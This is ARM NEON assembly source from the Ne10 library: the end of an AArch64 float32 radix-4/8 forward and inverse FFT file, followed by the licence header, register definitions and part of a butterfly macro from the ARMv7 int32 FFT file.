 * q_in3: Fin1[fstride1 + fstride]
 * q_in4: Fin1[fstride1*2]
 * q_in5: Fin1[fstride1*2 + fstride]
 * q_in6: Fin1[fstride1*3]
 * q_in7: Fin1[fstride1*3 + fstride]
 *
 */
adr tmp0, .L_TW_81
ld2 {q_in0_r, q_in0_i}, [p_in1], fstep
ld2 {q_in2_r, q_in2_i}, [p_in1], fstep
ld2 {q_in4_r, q_in4_i}, [p_in1], fstep
ld2 {q_in6_r, q_in6_i}, [p_in1], fstep
ld2 {q_in1_r, q_in1_i}, [p_in1], fstep
ld2 {q_in3_r, q_in3_i}, [p_in1], fstep
ld2 {q_in5_r, q_in5_i}, [p_in1], fstep
ld2 {q_in7_r, q_in7_i}, [p_in1], fstep
/* radix 4 butterfly without twiddles */
fadd q_sin0_r, q_in0_r, q_in1_r
fadd q_sin0_i, q_in0_i, q_in1_i
fsub q_sin1_r, q_in0_r, q_in1_r
fsub q_sin1_i, q_in0_i, q_in1_i
ld1 {d_tw_twn}, [tmp0]
fadd q_sin2_r, q_in2_r, q_in3_r
fadd q_sin2_i, q_in2_i, q_in3_i
fsub q_sin3_r, q_in2_r, q_in3_r
fsub q_sin3_i, q_in2_i, q_in3_i
fadd q_sin4_r, q_in4_r, q_in5_r
fadd q_sin4_i, q_in4_i, q_in5_i
fsub q_sin5_r, q_in4_r, q_in5_r
fsub q_sin5_i, q_in4_i, q_in5_i
fadd q_sin6_r, q_in6_r, q_in7_r
fadd q_sin6_i, q_in6_i, q_in7_i
fsub q_sin7_r, q_in6_r, q_in7_r
fsub q_sin7_i, q_in6_i, q_in7_i
.ifeqs "\inverse", "TRUE"
/* s5 = +j*sin5 via negate + copy (shl #0 is a register move);
 * s3, s7 pre-rotated by +/-45 deg before the 1/sqrt(2) scaling */
fneg q_s5_r, q_sin5_i
shl q_s5_i, q_sin5_r, #0
fsub q_s3_r, q_sin3_r, q_sin3_i
fadd q_s3_i, q_sin3_i, q_sin3_r
fadd q_s7_r, q_sin7_r, q_sin7_i
fsub q_s7_i, q_sin7_i, q_sin7_r
.else
/* s5 = -j*sin5; mirror-image rotations for the forward transform */
fneg q_s5_i, q_sin5_r
shl q_s5_r, q_sin5_i, #0
fadd q_s3_r, q_sin3_r, q_sin3_i
fsub q_s3_i, q_sin3_i, q_sin3_r
fsub q_s7_r, q_sin7_r, q_sin7_i
fadd q_s7_i, q_sin7_i, q_sin7_r
.endif
/* scale the rotated legs by +/-(1/sqrt(2)) from .L_TW_81 */
fmul q_s3_r, q_s3_r, d_tw_twn[0]
fmul q_s3_i, q_s3_i, d_tw_twn[0]
fmul q_s7_r, q_s7_r, d_tw_twn[1]
fmul q_s7_i, q_s7_i, d_tw_twn[1]
/* radix 2 butterfly */
fadd q_s8_r, q_sin0_r, q_sin4_r
fadd q_s8_i, q_sin0_i, q_sin4_i
fadd q_s9_r, q_sin1_r, q_s5_r
fadd q_s9_i, q_sin1_i, q_s5_i
fsub q_s10_r, q_sin0_r, q_sin4_r
fsub q_s10_i, q_sin0_i, q_sin4_i
fsub q_s11_r, q_sin1_r, q_s5_r
fsub q_s11_i, q_sin1_i, q_s5_i
/* radix 2 butterfly */
fadd q_s12_r, q_sin2_r, q_sin6_r
fadd q_s12_i, q_sin2_i, q_sin6_i
fadd q_s13_r, q_s3_r, q_s7_r
fadd q_s13_i, q_s3_i, q_s7_i
fsub q_s14_r, q_sin2_r, q_sin6_r
fsub q_s14_i, q_sin2_i, q_sin6_i
fsub q_s15_r, q_s3_r, q_s7_r
fsub q_s15_i, q_s3_i, q_s7_i
/* final radix-2 combines into the eight outputs */
fsub q_out_r4, q_s8_r, q_s12_r
fsub q_out_i4, q_s8_i, q_s12_i
fsub q_out_r5, q_s9_r, q_s13_r
fsub q_out_i5, q_s9_i, q_s13_i
fadd q_out_r0, q_s8_r, q_s12_r
fadd q_out_i0, q_s8_i, q_s12_i
fadd q_out_r1, q_s9_r, q_s13_r
fadd q_out_i1, q_s9_i, q_s13_i
.ifeqs "\inverse", "TRUE"
fsub q_out_r2, q_s10_r, q_s14_i
fadd q_out_i2, q_s10_i, q_s14_r
fsub q_out_r3, q_s11_r, q_s15_i
fadd q_out_i3, q_s11_i, q_s15_r
fadd q_out_r6, q_s10_r, q_s14_i
fsub q_out_i6, q_s10_i, q_s14_r
fadd q_out_r7, q_s11_r, q_s15_i
fsub q_out_i7, q_s11_i, q_s15_r
.else
fadd q_out_r2, q_s10_r, q_s14_i
fsub q_out_i2, q_s10_i, q_s14_r
fadd q_out_r3, q_s11_r, q_s15_i
fsub q_out_i3, q_s11_i, q_s15_r
fsub q_out_r6, q_s10_r, q_s14_i
fadd q_out_i6, q_s10_i, q_s14_r
fsub q_out_r7, q_s11_r, q_s15_i
fadd q_out_i7, q_s11_i, q_s15_r
.endif
/* 8x4 transpose, pass 1: interleave 32-bit lanes */
zip1 q_out_r028a, q_out_r0, q_out_r2
zip2 q_out_r028a_h, q_out_r0, q_out_r2
zip1 q_out_i028a, q_out_i0, q_out_i2
zip2 q_out_i028a_h, q_out_i0, q_out_i2
zip1 q_out_r139b, q_out_r1, q_out_r3
zip2 q_out_r139b_h, q_out_r1, q_out_r3
zip1 q_out_i139b, q_out_i1, q_out_i3
zip2 q_out_i139b_h, q_out_i1, q_out_i3
zip1 q_out_r46ce, q_out_r4, q_out_r6
zip2 q_out_r46ce_h, q_out_r4, q_out_r6
zip1 q_out_i46ce, q_out_i4, q_out_i6
zip2 q_out_i46ce_h, q_out_i4, q_out_i6
zip1 q_out_r57df, q_out_r5, q_out_r7
zip2 q_out_r57df_h, q_out_r5, q_out_r7
zip1 q_out_i57df, q_out_i5, q_out_i7
zip2 q_out_i57df_h, q_out_i5, q_out_i7
/* 8x4 transpose, pass 2: interleave 64-bit halves (raw v-regs alias the
 * q_out*_* names defined above) */
zip1 v12.2d, v16.2d, v4.2d
zip2 v20.2d, v16.2d, v4.2d
zip1 v24.2d, v17.2d, v5.2d
zip2 v28.2d, v17.2d, v5.2d
zip1 v13.2d, v18.2d, v6.2d
zip2 v21.2d, v18.2d, v6.2d
zip1 v25.2d, v19.2d, v7.2d
zip2 v29.2d, v19.2d, v7.2d
zip1 v14.2d, v0.2d, v8.2d
zip2 v22.2d, v0.2d, v8.2d
zip1 v26.2d, v1.2d, v9.2d
zip2 v30.2d, v1.2d, v9.2d
zip1 v15.2d, v2.2d, v10.2d
zip2 v23.2d, v2.2d, v10.2d
zip1 v27.2d, v3.2d, v11.2d
zip2 v31.2d, v3.2d, v11.2d
st4 {q_out0_r0246, q_out0_i0246, q_out1_r1357, q_out1_i1357}, [p_tmp], #64
st4 {q_out2_r8ace, q_out2_i8ace, q_out3_r9bdf, q_out3_i9bdf}, [p_tmp], #64
st4 {q_out0_r0246_h, q_out0_i0246_h, q_out1_r1357_h, q_out1_i1357_h}, [p_tmp], #64
st4 {q_out2_r8ace_h, q_out2_i8ace_h, q_out3_r9bdf_h, q_out3_i9bdf_h}, [p_tmp], #64
/* rewind the input pointer and advance to the next 32-B group */
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #32
.endm
/* Radix-8 twiddle constants +/-(1/sqrt(2)) = +/-cos(pi/4), loaded as
 * d_tw_twn by BUTTERFLY8X4_WITHOUT_TWIDDLES. */
.align 4
.L_TW_81:
.float 0.70710678
.float -0.70710678
/**
 * @details This function implements a radix-4/8 forwards FFT.
 *
 * @param[in,out] *Fout     (x0) output buffer; also receives the final stage
 * @param[in]     *Fin      (x1) input buffer
 * @param[in]     *factors  (x2) factors pointer:
 *                          0: stage number
 *                          1: stride for the first stage
 *                          others: factor out powers of 4, powers of 2
 * @param[in]     *twiddles (x3) twiddles coeffs of FFT
 * @param[in]     *buffer   (x4) scratch buffer, ping-ponged with Fout
 *                          between stages
 *
 * Clobbers: x5-x17, v0-v31 (v8-v15 saved/restored per AAPCS64).
 */
.align 4
.global ne10_mixed_radix_fft_forward_float32_neon
.type ne10_mixed_radix_fft_forward_float32_neon, %function
ne10_mixed_radix_fft_forward_float32_neon:
/* prologue: save x29/x30 and the callee-saved SIMD registers v8-v15 */
sub sp, sp, #16
stp x29, x30, [sp]
sub sp, sp, #64
st1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
sub sp, sp, #64
st1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
/* get factors[0]---stage_count factors[1]---fstride*/
/* one 64-bit load fetches both 32-bit ints (little-endian): high half =
 * factors[1] (fstride), low half (after mask) = factors[0] (stage_count) */
ldr stage_count, [p_factors]
lsr fstride, stage_count, 32
lsl stage_count, stage_count, 32
lsr stage_count, stage_count, 32
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
/* get factors[2*stage_count]--- the first radix */
/* get factors[2*stage_count-1]--- mstride */
sub p_factors, p_factors, #4 /* get the address of factors[2*stage_count-1] */
/* 64-bit load again: low half = mstride, high half = first-stage radix */
ldr mstride, [p_factors]
lsr radix, mstride, 32
lsl mstride, mstride, 32
lsr mstride, mstride, 32
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
.L_ne10_radix4_butterfly_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_first_stage_fstride
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_tmp, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
/* prime the first group of inputs for the macro */
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_other_stages_fstride:
mov p_tw1, p_twiddles
/* p_out1 = p_fout + (fstride - count_f) * mstride * 32 */
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_end:
/*Return From Function*/
/* epilogue: restore v8-v15 and x29/x30, unwind the stack */
ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
add sp, sp, #64
ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
add sp, sp, #64
ldp x29, x30, [sp]
add sp, sp, #16
ret
/* end of ne10_mixed_radix_fft_forward_float32_neon */
/**
 * @details This function implements a radix-4/8 backwards FFT.
 *
 * @param[in,out] *Fout     (x0) output buffer; also receives the final stage
 * @param[in]     *Fin      (x1) input buffer
 * @param[in]     *factors  (x2) factors pointer:
 *                          0: stage number
 *                          1: stride for the first stage
 *                          others: factor out powers of 4, powers of 2
 * @param[in]     *twiddles (x3) twiddles coeffs of FFT
 * @param[in]     *buffer   (x4) scratch buffer, ping-ponged with Fout
 *                          between stages
 *
 * The last stage additionally scales every output by 1/nfft.
 * Clobbers: x5-x17, v0-v31 (v8-v15 saved/restored per AAPCS64).
 */
.align 4
.global ne10_mixed_radix_fft_backward_float32_neon
.type ne10_mixed_radix_fft_backward_float32_neon, %function
ne10_mixed_radix_fft_backward_float32_neon:
/* prologue: save x29/x30 and the callee-saved SIMD registers v8-v15 */
sub sp, sp, #16
stp x29, x30, [sp]
sub sp, sp, #64
st1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
sub sp, sp, #64
st1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
/* get factors[0]---stage_count factors[1]---fstride*/
/* one 64-bit load fetches both 32-bit ints (little-endian): high half =
 * factors[1] (fstride), low half (after mask) = factors[0] (stage_count) */
ldr stage_count, [p_factors]
lsr fstride, stage_count, 32
lsl stage_count, stage_count, 32
lsr stage_count, stage_count, 32
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
/* get factors[2*stage_count]--- the first radix */
/* get factors[2*stage_count-1]--- mstride */
sub p_factors, p_factors, #4 /* get the address of factors[2*stage_count-1] */
/* 64-bit load again: low half = mstride, high half = first-stage radix */
ldr mstride, [p_factors]
lsr radix, mstride, 32
lsl mstride, mstride, 32
lsr mstride, mstride, 32
/* calculate 1/nfft for the last stage */
mul tmp0, radix, fstride
fmov s0, #0.5
scvtf s1, tmp0, #1 /* fixed-point convert with 1 fractional bit: s1 = nfft/2 */
fdiv s0, s0, s1 /* s0 = 0.5 / (nfft/2) = 1/nfft */
sub sp, sp, #16
stp d0, d1, [sp] /* leave 1/nfft at [sp] for the last-stage butterflies */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
.L_ne10_radix4_butterfly_inverse_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_first_stage_fstride
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_tmp, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
/* prime the first group of inputs for the macro */
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_other_stages_fstride:
mov p_tw1, p_twiddles
/* p_out1 = p_fout + (fstride - count_f) * mstride * 32 */
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_end:
/*Return From Function*/
/* epilogue: drop the 1/nfft slot, restore v8-v15 and x29/x30 */
ldp d0, d1, [sp]
add sp, sp, #16
ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
add sp, sp, #64
ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
add sp, sp, #64
ldp x29, x30, [sp]
add sp, sp, #16
ret
/* end of ne10_mixed_radix_fft_backward_float32_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 49,308 | modules/dsp/NE10_fft_int32.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_int32.neon.s
*/
.text
.syntax unified
/* Registers define*/
/*ARM Registers*/
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/*NEON variale Declaration for the first stage*/
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/*NEON variale Declaration for mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_fin1 .qn q1
q_fin2 .qn q2
q_fin3 .qn q3
q_scr0 .qn q15
q_scr1_r .qn q7
q_scr1_i .qn q8
q_scr2_r .qn q9
q_scr2_i .qn q10
q_scr3_r .qn q11
q_scr3_i .qn q12
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
/*
 * BUTTERFLY4X2_WITHOUT_TWIDDLES scaled_flag, inverse
 *
 * ARMv7 NEON radix-4 butterfly for the first stage of the int32 FFT
 * (all twiddles 1), two complex int32 values per quad register.
 * Expects q_in0_01..q_in3_01 pre-loaded; reloads the next pair from
 * p_fin0..p_fin3 (64-bit-aligned, post-incremented) while computing.
 * \scaled_flag == "TRUE" uses halving add/sub (vhadd/vhsub) so each
 * radix-2 step divides by 2, preventing fixed-point overflow.
 * \inverse selects the IFFT sign of the j rotation on the odd outputs.
 * Results are transposed with vtrn and stored through p_tmp.
 */
.macro BUTTERFLY4X2_WITHOUT_TWIDDLES scaled_flag, inverse
/* radix 4 butterfly without twiddles */
.ifeqs "\scaled_flag", "TRUE"
/* scaled variant: every add/sub halves the result (vhadd/vhsub) */
vhadd.s32 q_s0_2, q_in0_01, q_in2_01
vhsub.s32 q_s1_2, q_in0_01, q_in2_01
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vhadd.s32 q_s2_2, q_in1_01, q_in3_01
vhsub.s32 q_s3_2, q_in1_01, q_in3_01
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
vhsub.s32 q_out2_2, q_s0_2, q_s2_2
vhadd.s32 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vhsub.s32 d_out1_r15, d_s1_r2, d_s3_i2
vhadd.s32 d_out1_i15, d_s1_i2, d_s3_r2
vhadd.s32 d_out3_r37, d_s1_r2, d_s3_i2
vhsub.s32 d_out3_i37, d_s1_i2, d_s3_r2
.else
vhadd.s32 d_out1_r15, d_s1_r2, d_s3_i2
vhsub.s32 d_out1_i15, d_s1_i2, d_s3_r2
vhsub.s32 d_out3_r37, d_s1_r2, d_s3_i2
vhadd.s32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.else
/* unscaled variant: full-precision add/sub */
vadd.s32 q_s0_2, q_in0_01, q_in2_01
vsub.s32 q_s1_2, q_in0_01, q_in2_01
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vadd.s32 q_s2_2, q_in1_01, q_in3_01
vsub.s32 q_s3_2, q_in1_01, q_in3_01
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
vsub.s32 q_out2_2, q_s0_2, q_s2_2
vadd.s32 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vsub.s32 d_out1_r15, d_s1_r2, d_s3_i2
vadd.s32 d_out1_i15, d_s1_i2, d_s3_r2
